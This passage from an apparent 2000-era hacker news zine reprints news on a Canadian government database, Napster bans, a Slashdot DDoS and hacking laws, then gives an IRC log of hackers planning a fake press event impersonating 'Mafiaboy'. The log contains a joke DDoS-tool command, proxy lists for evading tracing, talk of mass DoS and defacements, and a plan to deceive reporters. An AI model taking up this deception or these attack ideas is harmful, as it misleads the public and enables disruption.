Privacy is further endangered because the information can be given out to non-government researchers, Phillips said. Most Canadians would be surprised to know their tax returns can be shared in this way, he said.

HRDC's files are not subject to laws preventing the public release of any individual's information.

Phillips said the database is "a hazard" because it creates a temptation for governments to develop profiles, "raising fears that data could be used to make decisions or predictions about individuals ... to the detriment of individual rights."

ASSURANCES

Privacy commissioners have always assured Canadians there was no such central file. An audit which began two years ago has proved them wrong and Canadians should be concerned, Phillips said.

The "extraordinarily detailed" central databank is called the Longitudinal Labour Force File.

There are proposals to make the file even more comprehensive by adding data on social assistance recipients from additional provinces and territories, and data from the Canada Student Loan Program, the Canada Pension Plan and the Old Age Security Program.
The central file has gradually built up with government reorganization, which has turned HRDC into "a virtual behemoth" that has taken over numerous social, employment and training programs from other departments.

Phillips said HRDC has responded to his concerns by saying the data is vital to help it develop policy, manage the effectiveness of its "interventions" and improve programs and service delivery.

-=-

Ottawa Citizen; http://www.ottawacitizen.com/national/000517/4116449.html

Vast database details every Canadian's life

Federal watchdog says some files hold 2,000 bits of information

Ian MacLeod
The Ottawa Citizen

The federal government has quietly created a massive computer database with intimate details about millions of Canadians, including income, employment, education and family status, federal Privacy Commissioner Bruce Phillips revealed yesterday.

"This is an enormous database with enormous amounts of information about each one of us," the nation's chief privacy watchdog said following the release of his annual report to Parliament on the state of personal privacy in Canada.

"Every one of us is covered in this file in one way or another. They have a complete record of you if you've had any contact anywhere with any (of a number of government departments and programs) ... which tells them how your life is progressing."

The Longitudinal Labour Force File, managed by Human Resources Development Canada, contains detailed data on 33.7 million living and dead Canadians. Some individual files contain as many as 2,000 bits and pieces of vital personal information, Mr. Phillips said.

The labour file was established about 15 years ago by Employment and Immigration Canada and is used to research and evaluate the effectiveness of the federal employment insurance program.
The information is gleaned from other government data banks and includes details from tax returns, child tax benefit files, provincial and municipal welfare files, federal jobs, job training and employment programs and services, employment insurance files and the social insurance master file.

Mr. Phillips said there are proposals to expand the file to include additional data on social assistance recipients from provinces and territories, the Canada Student Loan Program, the Canada Pension Plan and Old Age Security Program.

"Successive privacy commissioners have assured Canadians that there was no single federal government file, or profile about them," said Mr. Phillips. "We were wrong -- or not right enough for comfort.

"I don't question that they had, and they have, good reasons for doing this and that it is useful information in terms of improving the quality of their programs. I am not suggesting either that they've done anything unlawful here. They are complying with the strict letter of the law as we understand it.

"But there are serious problems here."

Although an HRDC Web site contains a brief description about the labour file, Mr. Phillips said much more has to be done to let Canadians know about the extent of the government's surveillance of its citizens.

"Transparency and knowledge about what the government is doing is important."

A senior HRDC official yesterday defended the file and said the department has been trying to address Mr. Phillips' concerns, including agreeing to purge individual data from the file after 25 years.

"We have taken his concerns seriously," said Bob Wilson, HRDC's director-general of evaluation and data development. "We're not unmindful of the privacy concerns surrounding the database.

"On the other hand, it's really important to Canadians that we do policy research and evaluation so that we can get programs that meet their needs.
So, as in all of these thorny public policy issues, there's a saw-off about where do you draw the line in respect of that."

He said specific information in the database is electronically masked to hide an individual's identity and that only a handful of HRDC officials have access to the technological hardware needed to unmask the data. He acknowledged the masked data is sometimes given to private firms for research and analysis.

"We're concerned about maintaining the privacy of individuals and we've done a large number of things to protect that," said Mr. Wilson. "We, perhaps not wisely, but nevertheless, have relied on the fact that we've been doing this for 15 years and never had a problem with it, never had even a hint of a (security) breach."

Mr. Phillips said he has no reason to believe current government officials are abusing the information contained in the file, though he questions what future officials might do and whether any officials really need all of the information the file contains. In effect, he said, the government is compiling a de facto profile of virtually every citizen in Canada.

"My problem here is ... the Privacy Act at the moment is insufficient to prevent these kinds of informational collections," he said.

"The Canadian public believes, for example, that when they send their tax information, it doesn't go out of the tax department. Well, in fact, it does, many times and to many places. There's something like 200 informational exchange agreements between Revenue Canada and various other agencies, plus other governments."

In the two years since the Office of the Privacy Commissioner found out about the labour file, Mr. Phillips said he has tried, unsuccessfully, to persuade HRDC officials to enact legislation to control the collection, handling and access to the information.

"I said years ago, the fear is not Big Brother, it's thousands of little brothers, all of whom have" increasing technological ability to monitor the personal lives of Canadians.

"But there is a Big Brother factor as well, and I think the Longitudinal Labour Force File is an example of the kind of thing that modern technology makes possible. We should know about it. We should know they're doing it and they should have to do it under very tightly written legal restraints about the usage of that information."

But Mr. Wilson said HRDC officials believe current laws and regulations offer many of the protections Mr. Phillips wants.

"We really need to sit down with him to find out exactly what he would like us to do by way of legislative framework," he said.

Longitudinal Labour Force File

Description: The bank contains all of the following information: Social Insurance Number, sex, date of birth, name and initials of the person. It may contain information on income, periods of employment and unemployment, eligibility of employment insurance and or social assistance, family situation, education, National Training Program courses taken and other employment services received.

Consistent Uses: ...It may be provided to private sector firms for planning, statistics, research and situations.

@HWA

216.0 [MM] Napster gets tough with Metallica
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.zdnet.com/zdnn/stories/news/0,4586,2568446,00.html

Napster gets tough with Metallica fans

A Napster message board goes dark after a user posts a hack for banned users. It was either that or go out of business, a company insider said.

By Marilynn Wheeler, ZDNet News
May 12, 2000 5:11 AM PT

Banned Napster users who figured out a way to get back onto the music download site were foiled late Thursday when instructions were removed from a Napster message board.
The "Circumventing Napster Bans" user forum was shut down and in its place was a warning from the company after ZDNet News published a link to the forum.

"Any posts regarding the circumvention of bans placed by Napster will be deleted and the username will be banned," Napster told visitors to the forum. "The IP will be logged, and a second offense will trigger an IP ban on the individual's account."

"The Napster discussion boards are moderated, and they have a policy of removing any user posts related to working around the user blocks regarding Metallica," said Napster spokesman Dan Wool.

Doing battle online

Last week Metallica, which is suing Napster for copyright violation, produced the names of hundreds of thousands of fans who had traded the band's music online. Napster responded by banning 317,377 users on Wednesday.

The ostracized fans complained they'd been tricked into downloading the latest version of Napster, which had installed tracking identification on their computers. Within hours, a way to get back online was posted in a Napster forum.

A user who asked not to be identified protested in an Internet Relay Chat with one of Napster's developers.

"(The instructions) went down because our PR firm told us to take them down," said the developer, identified as "nocarrier." "Having that information on our boards gives the impression to the world that we support the removal of our lock."

Crying censorship

"So it was removed," replied the user, "MindRape." "But that's censorship."

It's called protecting your company, the developer said. "We will GO OUT OF BUSINESS for s--- like that! Delete the post, or lose the court battle, and you lose your napster! This is reality man!"

"You had to do certain things to show you applied effort, but to CENSOR," the user replied. "I dunno man, I think that's Orwellian. Well, good luck."

"Thanks. We need it," the developer replied.

@HWA

217.0 [IND] The Slashdot DDoS attack: What happened?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by GTO (http://www.g-t-online.com/)

http://slashdot.org/article.pl?sid=00/05/17/1318233&mode=thread

Posted by CmdrTaco on Wednesday May 17, @10:00AM from the from-the-horses-mouth dept.

What follows this introduction is a rough summary of the crazy hell that we endured with the intermittent DDoS attacks we experienced last Thursday through Saturday. I'm sorry it took this long to put this together and tell you what happened, but as these things go, we were too busy trying to solve the problem to waste time talking about it. Big thanks to Andover.Net's Netops PatL, Martin and Liz, as well as Slashcode-wranglers PatG, Chris, Marc, Kurt and CowboyNeal, plus scoop (from freshmeat) and others who chimed in along the way. Tomorrow is part2: A good description of how the new Slashdot @ Exodus works.

What follows is more-or-less Pat "BSD-Pat" Lynch's account of the DDoS... Pat is our super 31337 BSD Junkie sysadmin. He wants everyone to know that the timeline below is little screwy, but things are more or less in sequential order. Things might not be exactly perfect, but hey, what do you expect after 30 hours without sleep?

Having moved the day before, none of us were truly familiar with exactly how the new hardware would handle the full burden of being 'slashdot.org'. The cluster (known affectionately as The Matrix) had handled its premiere day with flying colors, but we didn't really have an accurate feel of how things would react. Combine this with a couple of extremely high traffic stories posted on both Thursday and Friday, and it took us a while to determine that the problems were external, and not a flaw in some new component in the cluster."

The Attacks began Thursday morning. Most of it came in the form of SYN floods, from obvious /16's no less, and some /24's. We didn't have any zombie-killing software or a firewall installed because of certain network topology issues.
Later on, a second wave came, this closer to 8 or 9pm and the load balancer (an arrowpoint CS-100) died under the load.

The DDoS, as far as I could see, was a lot of SYN and Zero port packets coming from various /16's and /24's as well as a bunch of RFC1918 reserved addresses (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16). At one point we reached 109Mbits worth of traffic into our network.

Liz and I went back to Exodus and rebooted the Arrowpoint, then the site seemed "ok" for a bit.

By 3 in the morning, Liz decided that the PIX (Cisco's firewall) could simply not do what it was supposed to do, so we went back and started building a FreeBSD box as a bridging firewall. Just before we went to plug it in, I tried to ssh into the vpn-gate and noticed that nothing was working right: while the site worked, outgoing traffic and source groups on the Arrowpoint was screwed. As if that wasn't enough, two ports died on it already!

At some unknown point (time blurs after 30 hours straight!) Martin and PatG show up (thank the gods!) and they force us to go to sleep, they bring the site up outside the Arrowpoint, while Liz and I watch from a hotel room.

As of Friday morning, the site is semi-working, but the adsystem can't be updated, and we have no access to the backend servers. I scream bloody murder to Arrowpoint, who eventually shows up to blame the router: a cisco 6509 switch with two RSM/MSFCs.

Liz and I do packet dumps and determine it's not the router, the little CS-100 had died the night before, and that's where it all started. The Arrowpoint guy insists we did something to make the Arrowpoint not work (CT: Explicit description of precisely where Liz and Pat wanted to store the newly deceased Arrowpoint removed to keep things rated PG)

By 7 the CS-800 CSS is up we're almost done for the day, but we stay to make sure.

By 10pm we're exhausted but stable, although we're running 4 servers on a round-robin DNS while the new load balancer waits.
Netops (Liz, Martin and I) regroup, and do reintegration of new Arrowpoint CS-800 and installation of a new FreeBSD Firewall box instead of the PIX during Saturday Afternoon.

Slashdot returns to normal. Sysadmins get well-deserved sleep.

So that was the story. It was a pretty hellish weekend for everyone involved, but thanks again to those that helped get our ducks back in a row. Again, Part #2 to this (which originally was gonna be run last Thursday, but with all this ddos stuff got pushed aside) is a fairly detailed description of the new Slashdot setup at Exodus, complete with all the changes mentioned above. Fun for the whole family if your family is really into clusters of web servers."

@HWA

218.0 [IND] China Executes Bank Manager for Computer Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com/

News bulletin.

May 31, 2000

China Executes Bank Manager for Computer Crime

Human rights were thrown out of the window when China executed a bank manager for embezzling more than 2 million yuan by manipulating computer records. According to China's state run media, Shen and an accomplice were falsifying records and diverting funds into a personal account. The accomplice still remains at large. Full story here.

@HWA

219.0 [IND] Data Transmission Pioneer Passes Away
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com/

News bulletin.

May 31, 2000

Data Transmission Pioneer Passes Away

Donald W. Davies whose work included leading the team that built one of the first functioning networks using packet data, has passed away at age 75. Credited with coining the term "packet switching", Davies was one of the first people to realize that data needed to be broken into discrete packets and not transmitted as whole files. Davies later began his focus on computer security, conducting studies for teleprocessing systems, financial institutions, and government agencies.
His books included "Communication Networks for Computers" in 1973, "Computer Networks and their Protocols" in 1979, and "Security for Computer Networks" in 1984. Full story here.

@HWA

220.0 [IND] Canada Agrees to Drop Big Brother Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com/

News bulletin.

May 30, 2000

Canada Agrees to Drop Big Brother Files

In response to public outcry, the Canadian government has agreed to dismantle a large database that held as many as 2000 pieces of information on each of its citizens. Human Resources Minister, Jane Stewart publicly stated that, "Given public concerns about privacy issues in this era of advanced and constantly changing technology, I have chosen an approach that addresses future threats to privacy." Full story here.

@HWA

221.0 [IND] Senate Bill Will Make Minor Computer Hacking a Felony
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com/

News bulletin.

May 25, 2000

Senate Bill Will Make Minor Computer Hacking a Felony

Penned the "Internet Integrity and Critical Infrastructure Protection Act," bill number S. 2448 will make minor computer offenses felonies opening the door for the FBI and Secret Service to investigate. Other bills that the Senate is attempting to sneak by include the further expansion of wiretapping authority, which includes allowing the federal government to seize the house where the offending computer is residing, and making all computer crimes a predicate for wiretaps. Full story here.

The United States government is clearly being swept up in the mayhem caused by the ILOVEYOU virus. These bills are repressive and infringe on the rights of all United States citizens. If you find any of this the least bit disturbing, please contact your local Congressman and Senator.
@HWA

222.0 [IND] McAfee considers Netbus pro legitimate tool
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hacking tool slips through McAfee's net

McAfee's VirusScan software will no longer detect intrusion by a Trojan Horse-based remote administration tool used by hackers because it considers the product legitimate.

NetBus Pro is a commercial tool made by UltraAccess Networks that allows machines to be monitored and files to be accessed. But the product is based on the infamous Trojan Horse called NetBus and has been used illegally by hackers to gain access to systems.

McAfee used to report when it detected NetBus Pro in a network, but last week Network Associates, which publishes VirusScan, decided that it would no longer report incidences of NetBus Pro intrusions.

Jack Clark, European product manager for Network Associates, said: "McAfee will pick up the NetBus Trojan, but the Pro product is a genuine remote access tool."

He said there is no point alerting network managers whenever the tool is used legitimately, adding that the weekly update of the drivers for VirusScan would include a fix to halt some illegal uses of NetBus Pro.

"There is a way to hide the code on a user machine," said Clark. "The update will detect if someone attempts to hide their use of NetBus Pro in another file."

One of the original authors of the network intrusion tool Back Orifice, who is now a consultant for security adviser @Stake, said the hacker community has welcomed the news.

He added that these kinds of decisions were often influenced by legal concerns that rival remote access tools might be scanned out as viruses involving companies in antitrust battles.

Judd Spence, chief executive of UltraAccess, said there were many similar software programs that were not scanned by antivirus software.
First published in Network News

If you would like to comment on this article email us @ newseditor@vnunet.com

@HWA

223.0 [HWA] The Hoax
~~~~~~~~~~~~~~

I debated on whether or not to post this info/log since it has little real news merit but does have some potential social-disobedience overtones to it and is subversive in nature, after discussing it with several people and a reporter who shall remain unnamed it was decided it had merit in its own right so here it is to peruse and take as you will - Ed

One night in the underground...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Two hackers were bored one night and decided to perpetrate a hoax here is an overview of what transpired (Edited) I was almost pulled into the event as it unfolded, my involvement was minimal as i deal with real news not fake news however since I am known some people went ahead and assumed I gave the plans my blessings and included my site/zine without my consent, I asked for it to be removed from the original "press release" and it was.

http://www.news.insource.nl/

Mafiaboy holds chat

19 May 2000

The Canadian Mafiaboy, who pleaded guilty to carrying out DoS attacks on various major sites, is holding a chat in which anyone can ask him questions. The chat takes place on May 20 at 9 pm EST on EfNet in the channel #media-event. There he will answer all questions about what has happened to him and what is going to happen.

Source: Frank van Vliet

RAW INFO:

How it started:

[15:00] *** SliPY is now known as Mafiaboy
[15:00] ./tfn world
[15:01] ppl aren't drunk enough to laugh at that yet
[15:02] :)
[15:02] give me a few hrs
[15:02] tilli get drunk
[15:02] hehe
[15:02] and really make an ass of myself
[15:02] ok
[15:02] * MrEreet gets ready to sell tickets and starts work on the promotional website ...
[15:03] wanna have some fun?
[15:03] should set up a fake news conference and get media online
[15:03] well
[15:03] the police
[15:03] engage net media hype hoax #1
[15:03] are doing a news conference
[15:03] about me soon
[15:03] another one?
[15:03] it will be on cnn/cbc/global/atv (local/national news)
[15:04] the rcmp ;/
[15:04] "and there was much rejoicing"
[15:04] heh
[15:04] i hate the media
[15:04] they blow shit out of proportion and stuff
[15:04] like calling mafiaboy
[15:04] a hacker
[15:05] * tekneeq is away: (.) [BX-MsgLog Off]
[15:05] *** logistix (x25@mumma-said-knock-you-out.*.uk) has joined #darknet
[15:05] bleh....
[15:05] sveditorial@sjmercury.com - SILICON VALLEY.COM
[15:05] tips@news.com - C|Net News tips
[15:05] paulf@cnet.com - columnist for C|Net NEWS.COM
[15:05] patrick_houston@zdnet.com -
[15:05] Bob.Sullivan@msnbc.com - M$NBC
[15:05] adam.wolf@reuters.com - REUTERS Newswire
[15:05] nancy.bobrowitz@reuters.com
[15:05] news@pulse24.com - CityTV Toronto
[15:05] comments@foxnews.com - FOX news TV
[15:05] tips@wired.com - Wired media
[15:05] tips@news.com - NEWS.com
[15:05] mo@cmp.com -
[15:05] start mailing
[15:05] heh
[15:06] mass invite people to #media-event
[15:06] lol
[15:07] hehe "#leechasf eats a big fat hairy dick.../join #media-event"...
[15:07] TONIGHT MAFIABOY'S UNDERGROUND CYBERGANG THREATENS ATTACKS'
[15:07] some would come
[15:07] dumbasses
[15:07] *** gw4hn sets mode: +o logistix
[15:07] heheh
[15:07] fuck jennycam made the news
[15:08] hehe...
[15:08] anyone wanna pull a fake media event?
[15:08] and how many times did we take that over
[15:08] yeah, but honestly...its jennycam...hehe...
[15:08] i'll pose as mafiaboy

:

Session Start: Fri May 19 15:08:53 2000
Session Ident: Mafiaboy (SLiPY@dont.make.me.cap.yer.ass.and.throw.u.in-jail.net)
[15:08] no seriously
[15:08] u wanna do somethin like this?
[15:09] say mafiaboy speaks out etc [15:09] fuck i'm bored enough [15:09] haha [15:09] same [15:09] and i got no life [15:09] heh [15:09] hehe Session Close: Fri May 19 15:11:22 2000 : [15:08] :) [15:08] http://www.lightspeed.de/irc4all/ [15:08] grab yer proxies [15:08] heh [15:08] proxy? heh i'm on a eleet shell [15:08] http://www.cyberarmy.com/lists/proxy/ [15:09] http://proxylist.virtualave.net/ [15:09] http://proxylist.hypermart.net/list.htm [15:09] well [15:09] i'm gonna bot mafiaboy [15:09] there thats like 7k worth some might work [15:09] for a while i think [15:09] hope they don't packet me too bad [15:10] * [crow] is idle, auto-away after 10 mins. (l:On/p:On) [15:10] *** SugarKing (sugaking@*.net) has joined #darknet [15:11] * [crow] is back from the grave (53s) [15:13] *** |eXiSt| has quit IRC (|eXiSt| has no reason) [15:14] *** MrEreet is now known as Mitnick- [15:15] *** Mitnick- is now known as Optik- [15:21] * [crow] is idle, auto-away after 10 mins. (l:On/p:On) [15:21] * [crow] is back from the grave () [15:21] * [crow] is idle, dinner (l:On/p:On) [15:21] * tekneeq is back from the dead. . [15:24] *** Optik- is now known as MrEreet [15:24] **** That beta Ircd code is EXPLOITABLE ***** [15:25] info to come later [15:25] (that isn't a joke) [15:25] cruc [15:25] op me [15:26] *** Cruciphux sets mode: +o tekneeq [15:26] hrm.. [15:26] #media-event massive hoax in planning invite yer buddies we're gonna give CNN something entertaining [15:26] tekneeq: bandwidth came back up...but gotr00t is hrm...fucked up [15:26] pass it on but don't give the game away [15:27] Tutor: ack [15:27] *** tekneeq sets mode: +o Tutor [15:27] yeah i think they locked a MAC into the IP (idiots...) [15:27] but ultrapimpz is up....no DNS tho heh [15:27] .114 and .112 both down...whores.. 
[15:28] *** SpYrOOt (~anomaizer@*.s3curity.com) has joined #darknet [15:28] *** logistix is now known as aSsBaNdiT [15:28] *** mountd has quit IRC (Ping timeout) [15:31] *** klatch- (i0@*.cybercity.no) has joined #darknet [15:31] *** i0 has quit IRC (Ping timeout: 180 seconds) [15:31] *** klatch- is now known as i0 [15:31] *** LOB_Niall has quit IRC (xchat exiting..) [15:38] *** CodeZero (~code@*.com) has joined #Darknet [15:38] *** ojz (cazper@*.langame.net) has joined #darknet [15:40] *** snake- (snake@*.uno.edu) has joined #darknet [15:42] *** kgb-kid sets mode: +o CodeZero [15:42] cz0 [15:42] wtf [15:43] hum? [15:44] hum what? ;)) [15:45] hi gov [15:49] *** psy_eye (psy_eye@*.yu) has joined #darknet [15:50] #media-event pass it on [15:51] *** psy_eye has quit IRC (SendQ exceeded) [15:52] *** Mafiaboy is now known as SLiPY [15:54] *** CodeZero has quit IRC (Ping timeout: no data for 248 seconds) [15:55] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98) [15:57] *** CodeZero (~code@*.com) has joined #darknet [15:59] *** Shylock_ (juice@*.edu) has joined #darknet [16:00] *** typo_ (typo@inferno.*.edu) has joined #darknet [16:01] *** oxigen (oxigen@*.at) has joined #darknet [16:01] hi oxigen [16:01] alle leet ? [16:02] überleet ;) [16:02] uber alle [16:02] uber alles [16:03] *** m1x (m1x@*.org) has joined #darknet [16:03] cd /tmp [16:03] haha [16:03] cd: command not found [16:03] SWEET [16:03] m1x: all of us joining now ;) [16:03] Hi [16:08] *** Disconnected -=- Meanwhile behind the scenes in the 'control-booth' ... 
Session Start: Fri May 19 15:41:40 2000 [15:41] *** Now talking in #media-admin [§] Channel [ #media-admin ] Modes [ + ] [15:41] *** MrEreet sets mode: +snt+k pimped [15:42] *** Mafiaboy (SLiPY@dont.make.me.cap.yer.ass.and.throw.u.in-jail.net) has joined #media-admin [15:42] *** MrEreet sets mode: +o Mafiaboy [15:42] *** MrEreet changes topic to 'Hack of the millennium secret planning council' [15:42] :) [15:43] *** i0 (i0@*.cybercity.no) has joined #media-admin [15:43] Idle :P [15:43] *** k-rad-bob (mobys_dick@*.cybercity.no) has joined #media-admin [15:43] {} is ok [15:43] he hacked apache.org [15:43] leave the ops just get ppl talking here [15:44] lol [15:44] wut if fbi trace you down [15:44] hehe [15:44] i'll be using a proxy [15:44] I will be here [15:44] wouldnt want to miss it [15:45] *** flatline` (lick@*.euronet.nl) has joined #media-admin [15:45] *** twilight- (vvarder@*.com) has joined #media-admin [15:45] we could start mass dosing and shit to make it big [15:45] ;) [15:45] can i get a short summary of the "plans"? [15:45] i joined in pretty plate :/ [15:45] Mafiaboy, you want me to contact dutch magazines or not? [15:45] the idea of mass defacements crossed my mind but It wasn't my idea [15:45] :-) [15:45] *** Amoeba (webmaster@*.net) has joined #media-admin [15:45] heh [15:45] flatline` yeh [15:46] might want to use an alias so u don't blow your rep though [15:46] i need the e-mail. [15:46] *** SugarKing (sugaking@*.net) has joined #media-admin [15:46] forward it to flatline@*.com plz [15:46] and start thinking [15:46] coz if someone contacts the real mafiaboy ... [15:46] Anyone know wut 9pm est is in norwegian time [15:46] it should be vague [15:47] what kind of hoax is this? 
[15:47] http://www.timeanddate.com/time/abbreviations.html [15:47] *** Mafiaboy sets mode: +ooo Amoeba flatline` i0 [15:47] *** Mafiaboy sets mode: +ooo k-rad-bob SugarKing twilight- [15:47] *** Mafiaboy sets mode: -o i0 [15:48] *** Mafiaboy sets mode: -o Amoeba [15:48] tanx [15:48] *** Mafiaboy sets mode: +vv Amoeba i0 [15:48] hey! [15:48] no ops? [15:48] maybe we give them too much time [15:49] oh well [15:49] hmm [15:49] tommorow gives them time to check email [15:49] think any media outlets are actually gonna show? [15:49] tommorow nite will be good [15:50] so, what's the plan here? [15:50] well [15:50] 30 media places have been contacted [15:50] they come in [15:50] ask questions [15:50] we give serious answers [15:50] it will be mad fun [15:50] make news and shit [15:50] about what? [15:50] and then we talk aboit [15:50] and then we talk about [15:50] our plan [15:50] what did you tell them? [15:50] to takeover the world [15:50] ;) [15:50] i sent a formal email [15:50] haha [15:50] not lame or anything [15:50] lol [15:51] fwd me the email MrEreet@dok.org [15:51] ya [15:51] it'll be real funny if it makes it [15:51] yeah, forward me what you sent them [15:51] might wanna make the topic a little more interesting [15:51] heh [15:51] heh [15:51] all the @'s will talk about after the questions directed to mafiaboy, me at the time most likely, and then we talk about our plans to take over the world by packetting and all serious fun shit [15:51] where'd Debris go [15:51] and that the rcmp won't keep us down [15:51] he's probably on the fone with mafiaboy [15:51] his sister dated him [15:51] heh [15:51] espen@*.de forward there too [15:52] *** Mafiaboy is now known as SLiPY [15:52] MrEreet: haha, really? [15:52] yeh [15:52] that's fucked [15:52] gotta bot it [15:52] put it on a better host [15:52] till tommorow nite [15:52] so when mafiaboy comes on [15:52] he can use it [15:52] we gotta talk all fake and shit [15:53] is Mafiaboy in jail? 
[15:53] nah [15:53] not yet [15:53] *** Debris (3223@*.montreal.*.net) has joined #media-admin [15:53] he wont be [15:53] lets call him [15:53] ya [15:53] why? [15:53] too young [15:53] call who [15:53] someone set up a conf [15:53] *** SLiPY sets mode: +o Debris [15:53] oh [15:54] then Juvenile Detention? [15:54] mafiaboy [15:54] haha [15:54] no [15:54] he's at home [15:54] i dunno if they have that shit in Canada [15:54] well what's gonna happen to him? [15:54] Following the surprise plea the judge served the maximum sentence of 240 hours of community work plus one year's probation, restricted use of a computer, and ordered the defendant to deliver a speech at a local high school court on the evils of hacking. [15:54] thats why he is talkin to us. [15:54] mafiaboy lives 5minutes awayfrom me heh [15:54] slipy [15:54] thats j0n [15:54] not mafiaboy [15:54] Debris go get him [15:54] hehe [15:54] h3h [15:54] his parents dont let me in the house [15:54] so someone is going to pose as Mafiaboy? [15:54] my sisters in 3 of his classes [15:54] don't forget to mention as much as you can about the awesome HWA zine [15:55] j/k [15:55] how old is he? [15:55] rofl [15:55] fone [15:55] Debris: he still goes to school? [15:55] mention about my site [15:55] www.g-t-online.com [15:55] he must be, popular, hahahah [15:55] lol cru [15:55] debris [15:55] u sure? [15:55] haha shouldn't have said that [15:55] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98) [15:55] i thought it was mafiaboy [15:55] anyone spamming dalnet and undernet #hackphreak etc? [15:56] SLiPY: different people [15:56] one hacked MIT and NASA [15:56] i lost him [15:56] SLiPY, did you forward that e-mail? [15:57] cruci: are you going to be featuring this in next hwa issue? [15:57] he has too [15:57] flat, whats the email? 
[15:57] he'd be dumb not to:) [15:57] How We Fooled the Media [15:57] k-rad-bob lol [15:58] SLiPY: flatline@*.com [15:58] I would consider it twice though [15:58] you wouldn't be trusted with wired or anyone else [15:58] I admit i had no news or ideas so when that happens you do what 2600 does and manufacture irc logs to make news [15:58] most likely [15:58] oh someone tell #2600 but don't mention hoax those tight asses will expose it [15:59] lol [15:59] 2600 is gay [15:59] emmanuel is okIyAnsDV@2600.COM * Emmanuel Goldstein [15:59] emmanuel using irc.concentric.net Concentric Network Corporation [15:59] emmanuel has been idle 9hrs 11mins 39secs, signed on Thu May 18 03:45:18 [15:59] hmm [15:59] they breaks sticks with their but cheeks? [15:59] he gets media tho [15:59] dude [15:59] i doubt he'll buy it though [15:59] if u want the email letter i sent out [15:59] say yer email [15:59] i'll reply [15:59] and u guys forward it more to people [15:59] i did like 30 agencies now [15:59] I_am_the_real_gto@yahoo.com [16:00] Cruci, answer my msgs [16:00] k [16:02] might be fun if it doesn't fall apart [16:02] *** SLiPY sets mode: -o Debris [16:02] *** SLiPY sets mode: +o Debris [16:02] don't lose ops [16:02] heh [16:02] i did, it just got reset cuz the bot relinked to it [16:02] ok [16:02] debris [16:02] sorry bout that [16:02] bot trouble [16:02] i dont care heh [16:03] just only op bots [16:03] who is mafiaboy? [16:03] and keep the channel in lock down [16:03] hehe [16:03] its a secret [16:03] who is he? [16:03] a bot? [16:03] you want me to lock it? [16:03] Amoeba the real one? [16:03] an evil hacker [16:03] he DoS'd some big name websites off the net [16:03] yahoo and cnn [16:03] etc [16:04] don't forget to take flood protection off and scroll the TEXT SOURCE TO DeCSS in the channel. 
[16:05] fed #1 [16:05] [16:03] btw: talking with me is like talking directly to goverment ;-) [16:05] [16:03] * Nikkitaal *waves* on cybercops watching him [16:05] already id'd as hoax [16:05] anyone know him [16:13] heh [16:13] this is gonna be so much fun [16:13] and for fuck sakes [16:13] lets try to make this professional [16:13] how is it a hoax? [16:13] because mafiaboy won't really be here? [16:13] Bob, [16:13] Thanks for the note. I'm sure you understand my reservations. Is [16:13] there any way you can convince me this will be authentic? [16:13] Bob [16:13] hahaha [16:13] MSNBC [16:13] tell him that you are looking at him right now [16:13] no, nevermind [16:13] where would they be? [16:14] the feds? [16:14] bah [16:14] they can suck my dick [16:14] he is NASA security [16:14] i been raided already [16:14] [16:15] Slipy, they raided you? [16:15] yes [16:15] rcmp did [16:15] why? [16:15] who or what is rcmp? [16:15] *** SugarKing sets mode: +oo MrEreet SLiPY [16:15] royal canadian mounted police [16:15] oh [16:15] I'm not in canada [16:15] heh [16:15] we can tell [16:15] alright [16:15] bbiab [16:16] how would the be, ey? [16:16] the=that [16:16] *** flatline` has quit IRC (Ping timeout: 240 seconds) [16:16] haha [16:16] *** SugarKing has quit IRC (Leaving) [16:16] whats hwa's url [16:16] www.g-t-online.com [16:16] man [16:16] they emailed me back [16:16] saying they will be here [16:17] http://welcome.to/HWA.hax0r.news [16:17] hehehehehehheejh [16:17] who? [16:17] *** SLiPY is now known as YPiLS [16:17] can i have ops in chan plz [16:17] *** MrEreet is now known as Optik- [16:17] MSNBC [16:17] cool [16:17] *** Optik- is now known as MrEreet [16:18] don't forget to take flood protection off and scroll the TEXT SOURCE TO DeCSS in the channel. [16:18] we need to talk about [16:18] our future plans [16:19] and start a group [16:19] make it all up [16:19] but once we get a conf goin [16:19] we'll call mafia [16:20] what do you mean conference? 
[16:20] and I thought someone is going to act like amfia [16:20] mafia [16:20] oh we are [16:20] but we wanna talk to the real mafia [16:20] oh [16:21] I never talked to him [16:21] how old is he? [16:21] 15? [16:21] 15 [16:21] heh [16:21] will be mad fun [16:21] me too [16:21] I like to think of myself as 16 [16:21] we emailed [16:21] over 30 agencyes [16:21] msnbc has confirmed they will be here [16:22] opps [16:22] I never got a mail with your mail, so I can send it to more places [16:22] whats address [16:22] msnbc??? [16:22] i think 1 email fucked up [16:22] and said it couldn't be sent [16:22] get cnbc [16:22] I_am_the_real_gto@yahoo.com [16:22] what about ZDTV and ZDNET [16:23] emailed [16:23] but not replied [16:23] ok [16:23] ? [16:23] oh [16:23] this press release is rulling [16:23] what about wired news? [16:23] dude [16:23] you dont neeed that many [16:23] I hate to see what you do when you are more bored [16:23] all the online ones pick it up off of the wire [16:23] wired = emailed [16:23] zdnn replyed saying they got the tip [16:24] lol [16:25] so, can I have a part in this charade? [16:25] sure [16:25] we will introduce [16:25] the new group [16:25] heh [16:25] what kind of group? [16:25] and talk about our plans of chaos and deadly destruction [16:25] terrorisy [16:25] terrorist [16:25] brb [16:25] heh [16:25] we need to make this be good [16:25] gonna change my e-mail address so I don't get in trouble [16:25] *** Amoeba has quit IRC (ircN 7.24 + 7.0 for mIRC (2000/03/17 22.00)) [16:25] people bored yet? [16:25] heh [16:26] Thank you for sending your news tip to Wired News. We always welcome leads [16:26] that make our news informative and interesting. A reporter or editor may [16:26] follow up on this message with a request 